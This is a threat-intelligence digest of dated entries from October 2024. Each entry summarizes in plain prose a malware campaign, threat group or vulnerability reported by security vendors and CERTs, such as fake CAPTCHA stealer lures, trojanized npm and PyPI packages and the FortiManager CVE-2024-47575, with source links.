CryptoAITools_Malware_Campaign
LOW
Intel Source:
Checkmarx
Intel Name:
CryptoAITools_Malware_Campaign
Date of Scan:
2024-10-30
Impact:
LOW
Summary:
Researchers from Checkmarx have discovered a malware campaign that targets cryptocurrency users by pretending to offer trading tools. The attacker uses various methods to spread the malware, including a fake Python package called "cryptoaitools" on the PyPI repository and deceptive GitHub repositories. The malware disguises itself as a legitimate trading bot and targets both Windows and macOS devices. Its main goal is to steal sensitive information such as cryptocurrency wallet data, browser credentials, and other important system files.
Source: https://checkmarx.com/blog/cryptocurrency-enthusiasts-targeted-in-multi-vector-supply-chain-attack/
2024-10-30
New_FortiJump_Vulnerability_Exposed
MEDIUM
Intel Source:
Securonix Threat Labs
Intel Name:
New_FortiJump_Vulnerability_Exposed
Date of Scan:
2024-10-30
Impact:
MEDIUM
Summary:
A critical vulnerability, CVE-2024-47575, known as FortiJump, was identified in FortiManager, allowing remote, unauthenticated attackers to execute arbitrary commands due to a missing authentication check in the FGFM communication protocol. Discovered by UNC5820 through a collaboration between Fortinet and Mandiant, the vulnerability has been exploited since June 27, 2024. After notifying affected customers, Fortinet released a patch on October 23, 2024. The flaw poses significant risks as it enables attackers to access sensitive configuration files and potentially compromise connected FortiGate devices, facilitating further lateral movement within the network. The vulnerability carries a CVSS score of 9.8, marking it as critical.
Source: https://www.securonix.com/blog/details-and-guidance-on-new-fortijump-vulnerability-or-cve-2024-47575/
2024-10-30
Malicious_Campaign_Targets_Cybersecurity_Vendors
LOW
Intel Source:
Palo Alto
Intel Name:
Malicious_Campaign_Targets_Cybersecurity_Vendors
Date of Scan:
2024-10-30
Impact:
LOW
Summary:
A malicious campaign has been identified that impersonates cybersecurity vendors and VPN providers, with root domains registered between June 26 and October 8, 2024. Over the past month, these domains have been hosted on seven unique IP addresses, though many currently display "503 Service Unavailable" or "Internal Server Error" messages. Notably, some of the hosting infrastructure overlaps with that of the group Scattered Spider.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-28-IOCs-for-phising-campaign.txt
2024-10-29
Inside_the_You_Dun_Threat_Group_Open_Directory
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
Inside_the_You_Dun_Threat_Group_Open_Directory
Date of Scan:
2024-10-29
Impact:
MEDIUM
Summary:
The DFIR Report researchers have discovered an open directory linked to the Chinese-speaking hacking group You Dun. The group engaged in reconnaissance and web exploitation, utilizing tools like WebLogicScan, Vulmap, Xray, and SQLmap to identify and exploit vulnerable servers, particularly those running Zhiyuan OA software. They successfully executed SQL injection attacks and employed tools for privilege escalation, including Traitor for Linux and CDK for Docker and Kubernetes.
Source: https://thedfirreport.com/2024/10/28/inside-the-open-directory-of-the-you-dun-threat-group/
2024-10-29
Malicious_CAPTCHAs_Spread_Lumma_and_Amadey
LOW
Intel Source:
Securelist
Intel Name:
Malicious_CAPTCHAs_Spread_Lumma_and_Amadey
Date of Scan:
2024-10-29
Impact:
LOW
Summary:
Researchers from Securelist have discovered that attackers are using fake CAPTCHAs to spread the Lumma stealer and Amadey Trojan. Initially aimed at gamers, this strategy has spread to other sites, including adult and file-sharing websites, reaching a larger audience. The malicious CAPTCHA is inserted in ad networks, directing users to malware while masquerading as a human verification tool.
Source: https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/
2024-10-29
Rekoobe_Backdoor
LOW
Intel Source:
Hunt.IO
Intel Name:
Rekoobe_Backdoor
Date of Scan:
2024-10-29
Impact:
LOW
Summary:
Researchers from Hunt.IO have identified a malware called Rekoobe backdoor, which was earlier used by APT31, also known as Zirconium, for cyber espionage and data theft. This malware is based on Tiny Shell, an open-source tool, and has evolved with stronger encryption and customized C2 setups to avoid detection. The researchers also identified that this malware is hosted on an IP address associated with several suspicious domains mimicking TradingView, a popular financial platform. The attackers are trying to infiltrate or manipulate the platform's user community.
Source: https://hunt.io/blog/rekoobe-backdoor-discovered-in-open-directory-possibly-targeting-tradingview-users
2024-10-29
Spear_Phishing_Campaign_by_Midnight_Blizzard
MEDIUM
Intel Source:
Microsoft
Intel Name:
Spear_Phishing_Campaign_by_Midnight_Blizzard
Date of Scan:
2024-10-29
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered a phishing campaign by the Russian threat actor known as Midnight Blizzard, also known as APT29, Cozy Bear, and Nobelium. This campaign primarily focuses on individuals in government, academia, defense, and non-governmental organizations in various regions, such as the United Kingdom, Europe, Australia, and Japan, in order to collect intelligence. The phishing emails contain a malicious Remote Desktop Protocol (RDP) configuration file signed with a Let’s Encrypt certificate to make the emails appear more legitimate. Once the user opens the RDP file, it establishes a connection to a server controlled by the attackers and exposes sensitive resources such as files, directories, network drives, smart cards, printers, and microphones.
Source: https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/
2024-10-29
Crystal_Rans0m
MEDIUM
Intel Source:
Outpost24
Intel Name:
Crystal_Rans0m
Date of Scan:
2024-10-29
Impact:
MEDIUM
Summary:
Outpost24 researchers have uncovered a new ransomware named Crystal Rans0m that first appeared in 2023. The ransomware is written in the Rust programming language and operates not only to encrypt files and demand a ransom but also to steal sensitive information from the compromised systems. This approach is known as Stealer-as-a-Ransomware. This combined tactic, where both data theft and encryption happen in the same malware, can maximize the attack's impact. The ransomware group is financially motivated and targets victims without focusing on specific countries or industries. The most affected countries are Italy and Russia, followed by the U.S., the U.K., Ukraine, and China.
Source: https://outpost24.com/blog/crystal-ransom-hybrid-ransomware/
2024-10-29
Spike_in_Expiro_Malware_Infections_from_Zimbabwe
LOW
Intel Source:
Threat Stop
Intel Name:
Spike_in_Expiro_Malware_Infections_from_Zimbabwe
Date of Scan:
2024-10-29
Impact:
LOW
Summary:
Expiro malware is a persistent file infector that has affected Windows systems for over a decade and has seen a significant increase in infections, particularly from Zimbabwe, with a 20% rise in detected requests since October 25th. This sophisticated malware embeds itself into both 32-bit and 64-bit executable files, making detection and removal difficult. The challenge lies in the potential loss of critical system components when attempting to delete infected files, complicating the cleanup process.
Source: https://www.threatstop.com/blog/expiro-malware-a-decade-old-threat-resurfaces-with-a-vengeance
2024-10-28
CloudScout
MEDIUM
Intel Source:
ESET
Intel Name:
CloudScout
Date of Scan:
2024-10-28
Impact:
MEDIUM
Summary:
CloudScout is an advanced post-compromise toolset used by the China-aligned APT group Evasive Panda to target Taiwanese government and religious organizations from 2022 to 2023. By exploiting stolen web session cookies, CloudScout integrates with Evasive Panda's MgBot malware framework, allowing attackers to exfiltrate sensitive data from cloud services like Google Drive, Gmail, and Outlook. The toolset is modular, featuring at least ten known components, each specifically designed for accessing data from targeted platforms.
Source: https://www.welivesecurity.com/en/eset-research/cloudscout-evasive-panda-scouting-cloud-services/
2024-10-28
UAC_0001_Targets_Ukraine_Government_Entities
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0001_Targets_Ukraine_Government_Entities
Date of Scan:
2024-10-28
Impact:
LOW
Summary:
Researchers from CERT-UA have identified a campaign targeting government entities of Ukraine through phishing emails with the subject line "Table replacement". These emails contain a fake Google Docs link that tricks the user into clicking a reCAPTCHA box. Once the user clicks the box, a PowerShell command is copied to the clipboard of the user's machine, along with instructions to press Win+R and Ctrl+V to execute it. This command downloads malicious files, including a PowerShell script and an HTA file, to steal login credentials from browsers (such as Chrome, Firefox, and Edge), set up an SSH tunnel, and run the Metasploit tool.
Source: https://cert.gov.ua/article/6281123
2024-10-28
Evolving_Social_Engineering_by_Black_Basta
LOW
Intel Source:
ReliaQuest
Intel Name:
Evolving_Social_Engineering_by_Black_Basta
Date of Scan:
2024-10-28
Impact:
LOW
Summary:
Researchers from ReliaQuest have observed Black Basta's growing social engineering efforts, which included using Teams messages and QR codes to acquire access and spread ransomware. The attackers overwhelm customers with spam and act as support desks to deceive them into downloading harmful software.
Source: https://www.reliaquest.com/blog/black-basta-social-engineering-technique-microsoft-teams/
2024-10-28
TeamTNT_Targets_Cloud_Environments
LOW
Intel Source:
Aqua Sec
Intel Name:
TeamTNT_Targets_Cloud_Environments
Date of Scan:
2024-10-28
Impact:
LOW
Summary:
Aqua Nautilus researchers have uncovered a new campaign by the notorious hacking group TeamTNT, which is targeting cloud-native environments by exploiting exposed Docker daemons. The group aims to deploy Sliver malware, cyber worms, and cryptominers through compromised servers and Docker Hub. By appending infected Docker instances to Docker Swarm, they can utilize cloud capabilities and rent out victims' computational power for cryptomining, profiting without direct management. This campaign marks a return to TeamTNT's roots, featuring a shift from their traditional Tsunami backdoor to the more stealthy Sliver malware.
Source: https://www.aquasec.com/blog/threat-alert-teamtnts-docker-gatling-gun-campaign/
2024-10-28
UNC5812_Targets_Ukrainian_Military_Recruits
MEDIUM
Intel Source:
Mandiant
Intel Name:
UNC5812_Targets_Ukrainian_Military_Recruits
Date of Scan:
2024-10-28
Impact:
MEDIUM
Summary:
Google/Mandiant researchers have uncovered a campaign by a Russian-linked group called UNC5812 that combines espionage, malware delivery, and influence operations. This group operates through a Telegram channel, Civil Defense, which offers software to track Ukrainian military recruiters. However, if users install this software with security protections turned off, it secretly delivers malware along with a decoy map called SUNSPINNER. UNC5812 spreads this malware through its Telegram channel (@civildefense_com_ua) and website (civildefense[.]com.ua). It installs a downloader called Pronsis Loader that targets Windows users and initiates a complex infection chain to deliver information-stealing malware called PURESTEALER.
Source: https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives/
2024-10-28
MaaS_Infostealers_Adapt
LOW
Intel Source:
Elastic Labs
Intel Name:
MaaS_Infostealers_Adapt
Date of Scan:
2024-10-28
Impact:
LOW
Summary:
Elastic Labs researchers have observed that Google introduced a new feature called Application-Bound Encryption (ABE) in Chrome for Windows to protect cookies and other browser data. These cookies often store authentication tokens that allow users to stay logged in to websites. ABE encrypts cookie data and allows decryption only through the legitimate Chrome process. However, cybercriminals have updated their infostealers, such as STEALC, VIDAR, LUMMA, METASTEALER, PHEMEDRONE, and XENOSTEALER, with new techniques to bypass this protection. One such technique uses a hacking tool called ChromeKatz to abuse Windows COM services to unlock encrypted data in Chrome.
Source: https://www.elastic.co/security-labs/katz-and-mouse-game
2024-10-25
ValleyRAT_Insights
LOW
Intel Source:
Splunk
Intel Name:
ValleyRAT_Insights
Date of Scan:
2024-10-25
Impact:
LOW
Summary:
Splunk researchers have identified a malware known as ValleyRAT that first appeared in 2023 and targets Chinese-speaking users through phishing attacks. It allows attackers to take control of the victim's machine remotely to monitor their activity and deploy additional malicious software. ValleyRAT operates in several stages and loads each part step by step. This approach helps it stay hidden and continue operating on the compromised system during the attack.
Source: https://www.splunk.com/en_us/blog/security/valleyrat-insights-tactics-techniques-and-detection-methods.html
2024-10-25
Emerging_Threats_Targeting_Shell_Scripts
LOW
Intel Source:
ISC.SANS
Intel Name:
Emerging_Threats_Targeting_Shell_Scripts
Date of Scan:
2024-10-25
Impact:
LOW
Summary:
Researchers at SANS have highlighted several URLs with the .sh extension, indicating they are likely shell scripts. These scripts appear to be related to configuring environment variables and credentials, which are commonly used in web applications despite being less secure than other methods like secret managers. This approach is favored for its convenience and portability across development and production environments. Notably, attackers seem to be diversifying their tactics beyond traditional scans for files like ".env" to target these scripts, such as develop.sh and /docker/startups.sh, which are often used to configure and launch Docker containers.
Source: https://isc.sans.edu/diary/Everybody+Loves+Bash+Scripts+Including+Attackers/31376/
2024-10-25
DPRK_Attackers_Target_Developers_via_npm
LOW
Intel Source:
Datadog Security Labs
Intel Name:
DPRK_Attackers_Target_Developers_via_npm
Date of Scan:
2024-10-25
Impact:
LOW
Summary:
Researchers from Datadog Security Labs have observed three malicious npm packages (passports-js, bcrypts-js, and blockscan-api) associated with the DPRK threat actor "Tenacious Pungsan" in September 2024. The packages, which were downloaded 323 times, contained BeaverTail malware, a JavaScript infostealer associated with the Contagious Interview campaign.
Source: https://securitylabs.datadoghq.com/articles/tenacious-pungsan-dprk-threat-actor-contagious-interview/
2024-10-25
HeptaX_Cyberespionage_Operations
LOW
Intel Source:
Cyble
Intel Name:
HeptaX_Cyberespionage_Operations
Date of Scan:
2024-10-25
Impact:
LOW
Summary:
CRIL researchers have uncovered a phishing campaign called HeptaX, which starts with a ZIP file containing a malicious LNK file. When the user clicks the LNK file, it triggers a PowerShell command that downloads malicious scripts and BAT files from a remote server. These scripts create a new admin account and change Remote Desktop Protocol (RDP) settings to allow attackers to access the system remotely. Additionally, the attackers deploy ChromePass to steal saved passwords from browsers such as Chrome, increasing the risk of further account compromise. This group has been operating since 2023 and appears to target the healthcare sector, based on the lure file.
Source: https://cyble.com/blog/heptax-unauthorized-rdp-connections-for-cyberespionage-operations/
2024-10-25
XWorm_Spread_in_Italy_via_Fake_Namirial_Invoice
LOW
Intel Source:
CERT-AGID
Intel Name:
XWorm_Spread_in_Italy_via_Fake_Namirial_Invoice
Date of Scan:
2024-10-25
Impact:
LOW
Summary:
Researchers at CERT-AGID have uncovered a phishing campaign in which attackers are spreading the XWorm RAT through fake emails disguised as official communications from the Namirial operator. The emails are written in Italian and encourage recipients to open a PDF attachment or click a link inside the message. The link downloads a ZIP file from Dropbox containing a URL file that uses TryCloudflare to create temporary tunnels connecting to the attackers’ hidden servers. The attack continues with another ZIP file download, which includes a Python interpreter and malicious scripts. These scripts activate malware that gives the attackers control over the victim's machine.
Source: https://cert-agid.gov.it/news/xworm-diffuso-in-italia-tramite-falsa-fattura-namirial/
2024-10-25
Ukraine_CERT_Warns_of_New_Phishing_Campaign
LOW
Intel Source:
CERT-UA
Intel Name:
Ukraine_CERT_Warns_of_New_Phishing_Campaign
Date of Scan:
2024-10-25
Impact:
LOW
Summary:
https://cert.gov.ua/article/6281095
Source: https://cert.gov.ua/article/6281095
2024-10-24
Lazarus_APT_Targeting_Cryptocurrency
LOW
Intel Source:
Securelist
Intel Name:
Lazarus_APT_Targeting_Cryptocurrency
Date of Scan:
2024-10-24
Impact:
LOW
Summary:
Researchers from Securelist have found that Lazarus is still a very active APT group targeting cryptocurrency, employing advanced tactics such as generative AI and zero-day flaws. Vulnerabilities in Google Chrome's JIT compilers are also revealed; however, the new V8 sandbox could mitigate future concerns.
Source: https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/
2024-10-24
Web_Shell_and_VPN_Threats
LOW
Intel Source:
Trend Micro
Intel Name:
Web_Shell_and_VPN_Threats
Date of Scan:
2024-10-24
Impact:
LOW
Summary:
TrendMicro researchers have identified that attackers are increasingly employing a layered fallback strategy that utilizes multiple tools, such as web shells, tunneling software, and remote access applications to maintain access to compromised systems, even if one entry point is blocked. Web shells provide interactive access, allowing for quick adaptation of tactics. By compromising VPN accounts, attackers can blend into the network, disguising malicious activities as legitimate processes.
Source: https://www.trendmicro.com/en_us/research/24/j/understanding-the-initial-stages-of-web-shell-and-vpn-threats-an.html
2024-10-24
Operation_Cobalt_Whisper
LOW
Intel Source:
SEQRITE Labs
Intel Name:
Operation_Cobalt_Whisper
Date of Scan:
2024-10-24
Impact:
LOW
Summary:
Researchers from SEQRITE Labs have uncovered a cyber espionage campaign tracked as Operation Cobalt Whisper targeting the defence sector in Pakistan and researchers, engineers, and professors in Hong Kong. The attackers use decoy documents related to electrotechnical societies and awards to trick victims into executing malicious payloads. They deploy the Cobalt Strike tool via VBScript and LNK shortcuts hidden in RAR archives to infiltrate systems and steal sensitive data by connecting to their C2 servers. The primary focus of this campaign is to steal intellectual property and critical research from these industries.
Source: https://www.seqrite.com/blog/operation-cobalt-whisper-targets-industries-hong-kong-pakistan/
2024-10-24
Critical_FortiManager_Vulnerability_Disclosed
MEDIUM
Intel Source:
FortiGuard Labs
Intel Name:
Critical_FortiManager_Vulnerability_Disclosed
Date of Scan:
2024-10-24
Impact:
MEDIUM
Summary:
FortiGuard Labs researchers have disclosed a critical vulnerability in FortiManager, tracked as CVE-2024-47575, which has been exploited in zero-day attacks. The vulnerability arises from a missing authentication issue in the fgfmd daemon, allowing remote unauthenticated attackers to execute arbitrary code via specially crafted requests. This affects specific older FortiAnalyzer models (1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E) that have FortiManager enabled and at least one interface with the fgfm service active. The attacks can potentially steal sensitive configuration files, IP addresses, and credentials for managed devices.
Source: https://www.fortiguard.com/psirt/FG-IR-24-423
2024-10-23
TA866_Threat_Actor
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
TA866_Threat_Actor
Date of Scan:
2024-10-23
Impact:
MEDIUM
Summary:
Researchers from Cisco Talos have uncovered the threat group named TA866 also known as Asylum Ambuscade. This group has been active since 2020 and conducts financially motivated and espionage-related cyber operations. TA866 primarily targets organizations in the U.S., U.K., Europe and Canada especially in manufacturing, government, and finance sectors. The attacker often uses the tactic of malspam emails or malicious advertisements to trick victims into downloading malware. TA866 uses tools like WasabiSeed, ScreenShotter, and AHK Bot along with advanced payloads like the Resident backdoor, CSharp-Streamer-RAT, Cobalt Strike, and Rhadamanthys malware. These tools allow them to gather information and maintain control over compromised systems.
Source: https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/
2024-10-23
WarmCookie_Malware
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
WarmCookie_Malware
Date of Scan:
2024-10-23
Impact:
MEDIUM
Summary:
Cisco Talos researchers have identified a malware called WarmCookie, also known as BadSpace, that emerged in April 2024. This malware is being distributed through malspam and malvertising campaigns. WarmCookie provides attackers with initial access to systems, maintains persistence, and performs various malicious activities such as deploying payloads, executing commands, manipulating files, and taking screenshots. These capabilities help attackers maintain long-term control over compromised networks after gaining initial access. The malware distribution starts with email-based campaigns in which attackers use lures such as fake invoices or job offers to trick victims into clicking malicious links. Alternatively, WarmCookie can also be delivered via malvertising campaigns, where infected ads redirect users to malware-hosting sites.
Source: https://blog.talosintelligence.com/warmcookie-analysis/
2024-10-23
Roundcube_Vulnerability_Fuels_Phishing_Attacks
LOW
Intel Source:
SOC Radar
Intel Name:
Roundcube_Vulnerability_Fuels_Phishing_Attacks
Date of Scan:
2024-10-23
Impact:
LOW
Summary:
A recently identified vulnerability in the open-source Roundcube Webmail, designated CVE-2024-37383, has been exploited by threat actors for phishing attacks aimed at stealing user credentials. Despite being patched, this stored XSS vulnerability poses ongoing risks for targeted exploitation. In June 2024, it was notably used in phishing campaigns against government organizations in the Commonwealth of Independent States (CIS), with attackers embedding hidden payloads in seemingly benign email attachments.
Source: https://socradar.io/roundcube-vulnerability-cve-2024-37383-exploited-in-phishing-attacks-targeting-government-agencies-for-credential-theft/
2024-10-23
DarkComet_Exploits_in_Cyberattacks
LOW
Intel Source:
Any.Run
Intel Name:
DarkComet_Exploits_in_Cyberattacks
Date of Scan:
2024-10-23
Impact:
LOW
Summary:
Researchers at Any.Run have analyzed DarkComet RAT, a stealthy, feature-rich malware used in targeted attacks. It allows remote system control, data theft, and malware installation while avoiding detection by modifying files and registry keys. DarkComet collects system information, communicates with a C2 server, and executes commands such as keystroke logging and display control, making it highly versatile for attackers.
Source: https://any.run/cybersecurity-blog/darkcomet-rat-technical-analysis/
2024-10-23
Cyberattack_Targeting_Ukraine_State_Entities
LOW
Intel Source:
CERT-UA
Intel Name:
Cyberattack_Targeting_Ukraine_State_Entities
Date of Scan:
2024-10-23
Impact:
LOW
Summary:
On October 22, 2024, Ukraine's CERT-UA reported a mass phishing campaign targeting state authorities, key industries, and military formations. The emails, purportedly about integration with Amazon services and Microsoft’s zero trust architecture, included RDP configuration files. Opening these files would establish an outgoing RDP connection to attackers’ servers, potentially granting them extensive access to victims' local resources and the ability to execute third-party scripts. Investigations suggest that preparations for these cyberattacks began as early as August 2024, and the threat appears to be widespread based on related domain activities.
Source: https://cert.gov.ua/article/6281076
2024-10-23
Embargo_Ransomware
MEDIUM
Intel Source:
ESET
Intel Name:
Embargo_Ransomware
Date of Scan:
2024-10-23
Impact:
MEDIUM
Summary:
ESET researchers have discovered a new ransomware group called Embargo that first appeared in May 2024. The group writes its ransomware payload in Rust and targets both Windows and Linux. Its tools include MDeployer, a malicious loader that deploys the ransomware, and MS4Killer, an EDR killer that disables security software. The group mainly targets U.S.-based organisations, using tactics such as disabling security measures in Safe Mode to carry out its attacks. It operates as a RaaS provider and offers its ransomware tools to affiliates, as other gangs do. Embargo uses a double-extortion tactic, threatening to publish the stolen data unless the ransom is paid.
Source: https://www.welivesecurity.com/en/eset-research/embargo-ransomware-rocknrust/
2024-10-23
Grandoreiro_Targets_Beyond_Banking
LOW
Intel Source:
Securelist
Intel Name:
Grandoreiro_Targets_Beyond_Banking
Date of Scan:
2024-10-23
Impact:
LOW
Summary:
Researchers from Securelist have discovered that Brazilian banking trojans, such as Grandoreiro, are spreading globally, filling the void left by ransomware-focused Eastern European gangs. As desktop banking declines, Grandoreiro is targeting businesses and governments. Its operators constantly alter their strategies to avoid detection, and Securelist collaborates with INTERPOL and other organizations to tackle the threat.
Source: https://securelist.com/grandoreiro-banking-trojan/114257/
2024-10-23
Unmasking_Prometei_Botnet
LOW
Intel Source:
Trend Micro
Intel Name:
Unmasking_Prometei_Botnet
Date of Scan:
2024-10-23
Impact:
LOW
Summary:
Trend Micro researchers have uncovered the Prometei botnet, which has been active since 2016. The malware performs malicious activities such as mining Monero cryptocurrency and stealing credentials. It gains access by exploiting vulnerabilities such as BlueKeep and Microsoft Exchange Server flaws. Prometei uses PowerShell scripts to download additional malicious files and maintain persistence. The botnet employs a domain generation algorithm (DGA) to control infected systems remotely. It has infected over 10,000 systems across countries such as Brazil, Indonesia, and Turkey.
Source: https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html
2024-10-22
Bumblebee_Malware_Returns
MEDIUM
Intel Source:
Netskope
Intel Name:
Bumblebee_Malware_Returns
Date of Scan:
2024-10-22
Impact:
MEDIUM
Summary:
Bumblebee is sophisticated malware used by cybercriminals to infiltrate corporate networks and deploy additional payloads like Cobalt Strike beacons and ransomware. Discovered by the Google Threat Analysis Group in March 2022, it recently resurfaced in a new infection chain identified by Netskope Threat Labs. This campaign marks the first instance of Bumblebee activity since Europol's Operation Endgame in May 2024, which targeted major botnets. The infection typically begins with a phishing email prompting the victim to download a ZIP file containing an LNK file, which, when executed, triggers the Bumblebee payload download directly into memory, bypassing disk storage.
Source: https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence
2024-10-22
Emergence_of_Latrodectus
LOW
Intel Source:
VMRAY
Intel Name:
Emergence_of_Latrodectus
Date of Scan:
2024-10-22
Impact:
LOW
Summary:
Latrodectus, a new malware first discovered in October 2023, functions primarily as a loader/downloader and has emerged as a successor to the notorious IcedID loader, which was dismantled in May 2024 through an international operation led by Europol. Following this crackdown, Latrodectus has rapidly evolved, with its developers releasing multiple new versions featuring minor changes and even removing existing functionalities. This iterative development aims to stay ahead in the ongoing battle between cybersecurity defenders and threat actors.
Source: https://www.vmray.com/latrodectus-a-year-in-the-making/
2024-10-22
MacOS_NotLockBit_Ransomware
MEDIUM
Intel Source:
SentinelOne
Intel Name:
MacOS_NotLockBit_Ransomware
Date of Scan:
2024-10-22
Impact:
MEDIUM
Summary:
SentinelOne researchers have observed several samples of a macOS ransomware called NotLockBit. It is written in the Go programming language and runs only on Intel Macs, or on newer Apple silicon Macs with the Rosetta emulation software installed. The ransomware collects system information such as the machine's product name, version, architecture, and uptime. It drops a README.txt file with ransom instructions in every folder containing encrypted files and changes the desktop wallpaper to a LockBit 2.0 banner, even though LockBit has moved on to version 3.0. The attackers are therefore believed not to be affiliated with LockBit. NotLockBit also uses Amazon S3 cloud storage to exfiltrate victim data before locking files.
Source: https://www.sentinelone.com/blog/macos-notlockbit-evolving-ransomware-samples-suggest-a-threat-actor-sharpening-its-tools/
2024-10-22
ESET_Impersonated_in_Phishing_Attack_on_Israel
LOW
Intel Source:
DoublePulsar
Intel Name:
ESET_Impersonated_in_Phishing_Attack_on_Israel
Date of Scan:
2024-10-22
Impact:
LOW
Summary:
Hackers have been impersonating the cybersecurity firm ESET in a phishing campaign targeting Israeli organizations. They sent malicious emails warning recipients about state-backed hackers and offering a fake "ESET Unleashed" program to combat the threat. Clicking the link led to a ZIP file containing wiper malware designed to erase data from infected devices. Security researchers have highlighted that the attackers had breached ESET's defenses, with the malware hosted on ESET's servers. Although Google flagged the emails as dangerous, many users fell for the ruse. ESET has denied any direct compromise, attributing the incident to partner involvement.
Source: https://doublepulsar.com/eiw-eset-israel-wiper-used-in-active-attacks-targeting-israeli-orgs-b1210aed7021
2024-10-22
Docker_API_Targeted_for_Cryptominer_Attack
LOW
Intel Source:
Trend Micro
Intel Name:
Docker_API_Targeted_for_Cryptominer_Attack
Date of Scan:
2024-10-22
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered a cryptomining attack against Docker remote API servers, in which the threat actor leveraged the gRPC protocol over HTTP/2 cleartext (h2c) to avoid security safeguards. The attacker initially examined the availability and version of the Docker API before upgrading to gRPC/h2c to modify Docker functionality. They installed the SRBMiner cryptominer from GitHub, which mined XRP cryptocurrency for their wallet and public IP.
Source: https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-cryptominer-deployment.html
2024-10-22
PowerRAT_and_DCRAT_Deliver_Through_Gophish
LOW
Intel Source:
Cisco Talos
Intel Name:
PowerRAT_and_DCRAT_Deliver_Through_Gophish
Date of Scan:
2024-10-22
Impact:
LOW
Summary:
Cisco Talos researchers have discovered a phishing campaign in which attackers use an open-source toolkit called Gophish. The attacker targets Russian-speaking users, judging by the language of the phishing emails and by a fake VKontakte webpage, a social media platform popular among users in Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan, and Azerbaijan. The phishing emails contain Word documents (maldocs) or HTML files that trick victims into triggering malware such as PowerRAT and DCRAT. PowerRAT collects information such as the username, computer name, and drive serial number and sends it to a C2 server. DCRAT is delivered through an HTML-based infection method and is capable of controlling the victim's computer remotely, executing commands, stealing sensitive data, capturing screenshots, and even logging keystrokes.
Source: https://blog.talosintelligence.com/gophish-powerrat-dcrat/
2024-10-22
IcedID_Campaign_Analysis_and_Findings
LOW
Intel Source:
Walmart Global Tech Blog
Intel Name:
IcedID_Campaign_Analysis_and_Findings
Date of Scan:
2024-10-22
Impact:
LOW
Summary:
Researchers investigated the IcedID campaign utilizing GitLab and revealed a sample with overlapping imphash characteristics with another sample, communicating with a different domain. Upon unpacking, the sample exhibited strings indicative of a system and network profiler, but most were encoded. The decoding process involved extracting the string length from the first six bytes, with an initial XOR seed followed by a PRNG-like function to decode the strings.
Source: https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39
2024-10-21
GHOSTPULSE_Malware
LOW
Intel Source:
Elastic Labs
Intel Name:
GHOSTPULSE_Malware
Date of Scan:
2024-10-21
Impact:
LOW
Summary:
Elastic Labs researchers have identified a malware called GHOSTPULSE, also known as HIJACKLOADER or IDATLOADER, first discovered in 2023. The malware hides its configuration and payload within the pixels of an image and extracts that information from the image's colours. In recent GHOSTPULSE campaigns, attackers trick victims by presenting a fake CAPTCHA validation on a website that instructs the user to perform specific Windows keyboard shortcuts, which leads to the execution of malicious commands such as a PowerShell script that downloads and runs the GHOSTPULSE payload.
Source: https://www.elastic.co/security-labs/tricks-and-treats
2024-10-21
Lumma_Stealer_Targets_Data_with_CAPTCHA
LOW
Intel Source:
Qualys
Intel Name:
Lumma_Stealer_Targets_Data_with_CAPTCHA
Date of Scan:
2024-10-21
Impact:
LOW
Summary:
Researchers from Qualys have found a fraudulent Lumma Stealer campaign that uses bogus CAPTCHA verification to deploy malware. Lumma Stealer, an information-stealing malware available through Malware-as-a-Service (MaaS), collects sensitive data such as passwords, browser credentials, and cryptocurrency wallet information.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
2024-10-21
Kral_and_Vidar_Stealers_on_the_Rise
LOW
Intel Source:
Securelist
Intel Name:
Kral_and_Vidar_Stealers_on_the_Rise
Date of Scan:
2024-10-21
Impact:
LOW
Summary:
Researchers from Securelist have discovered a substantial rise in the spread of information stealers, which cybercriminals use to collect credentials for sale on the dark web or to launch further attacks. These threats affected over ten million devices in 2023. Among the significant findings, the Kral stealer, which is tied to the Kral downloader, targets cryptocurrency wallets and browser data, while AMOS targets macOS users. Vidar, which has spread through YouTube comments, raises additional concerns.
Source: https://securelist.com/kral-amos-vidar-acr-stealers/114237/
2024-10-21
Trojanized_npm_Packages_Stealing_ETH_Keys
LOW
Intel Source:
Phylum
Intel Name:
Trojanized_npm_Packages_Stealing_ETH_Keys
Date of Scan:
2024-10-21
Impact:
LOW
Summary:
Researchers at Phylum have discovered a complicated attack combining trojanized Ethereum-related packages on npm, which was designed to steal private keys and acquire unauthorized SSH access. These packages hide malware behind multiple layers of indirection, taking advantage of the modularity of the genuine ethers library. The attack extracts Ethereum keys via a series of files while also altering the SSH authorized_keys file to add the attacker's public key.
Source: https://blog.phylum.io/trojanized-ethers-forks-on-npm-attempting-to-steal-ethereum-private-keys/
2024-10-21
Mysterious_Elephant_Group_Targeting_South_Asia
LOW
Intel Source:
QiAnXin
Intel Name:
Mysterious_Elephant_Group_Targeting_South_Asia
Date of Scan:
2024-10-21
Impact:
LOW
Summary:
QiAnXin researchers have analyzed the activities of Mysterious Elephant, a South Asian APT group identified by Kaspersky in 2023. The analysis highlights the group's use of a new backdoor named ORPCBackdoor, originally attributed to the Bitter group. This attribution confusion stems from similarities in attack methods and shared infrastructure. Recent discoveries include CHM files disguised as PDFs containing C# backdoors, targeting entities in Pakistan and other South Asian countries.
